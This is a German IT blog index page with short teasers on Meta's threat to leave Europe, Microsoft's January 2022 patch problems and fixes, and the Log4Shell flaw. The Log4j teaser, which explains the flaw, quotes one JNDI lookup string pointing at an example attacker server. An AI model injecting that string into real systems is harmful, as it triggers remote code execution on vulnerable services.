WeBLOG
Einträge pro Seite anzeigen | Anzahl: 199 vorhanden 
    1  2  3  4  5  6  7  8 ... 50    
Facebook/Meta Exit-Drohung in Europa (08.02.2022)
Der Konzern Meta (ehemals Facebook) droht, man wolle sich in Europa zurückziehen, sofern man nicht weiter Daten aus Europa in die USA transferieren und für das Micro-Targeting auswerten dürfe.

"Die Botschaft hör ich wohl, allein mir fehlt der Glaube." (Johann Wolfgang von Goethe aus Faust)


Weiterlesen...

Fixes für die Januar-MS-Patches (18.01.2022)
Wie in diesem Beitrag berichtet, gab es mit den Januar-Sicherheitsupdates vom 11.01.2022 massive Probleme. Microsoft hat am gestrigen Abend (17.01.2022) Patches für die Patches ausgeliefert, welche die Schwierigkeiten beseitigen sollen. Die Installation ist jeweils optional, d.h. erfolgt nicht automatisch. Nachstehend eine Liste der Sonderupdates (Out-of-Band) mit Links zu den Supportbeiträgen der Redmonder:

Weiterlesen...

Massive Probleme mit MS-Sicherheitsupdates vom Januar 2022 (13.01.2022)
Die letzten Windows-Sicherheitsupdates machen extremen Ärger. Vor allem Domain Controller unter Windows-Server-Systemen (2012 R2, 2016, 2019 und 2022) fallen in Boot-Schleifen.

Eigentlich sollte der bekannte Active Directory-Bug beseitigt werden und herausgekommen sind völlig unbrauchbare Server.

Anwender, die VPN-Verbindungen mit L2TP over IPSEC nutzen, werden ebenfalls enttäucht sein, denn diese funktionieren nicht mehr. Dies betrifft auch Windows 10 und 11.


Weiterlesen...

Log4j und die Log4Shell-Lücke (14.12.2021)
Der Fehler liegt in der "Log4Shell" in der weit verbreiteten Java-Logging-Bibliothek "Log4j". Es lässt sich quasi beliebiger Code ausführen und das dazu noch sehr einfach. In der Java-Welt kommt diese Bibliothek häufig vor, um Prozesse zu protokollieren und etwaige Fehler zu finden.

Das Problem dabei ist, dass "Log4Shell" nicht einfach nur schreibt, sondern darüber hinaus versucht den Protokolltext zu interpretieren. Enthält dieser z.B. die Zeichenfolge "${jndi:ldap://angreifer.server.de/a}", dann ist das Kind in den Brunnen gefallen, weil der Dienst den Server "angreifer.server.de" kontaktiert und von diesem ungefragt Java-Code entgegennimmt und ausführt.


Weiterlesen...

    1  2  3  4  5  6  7  8 ... 50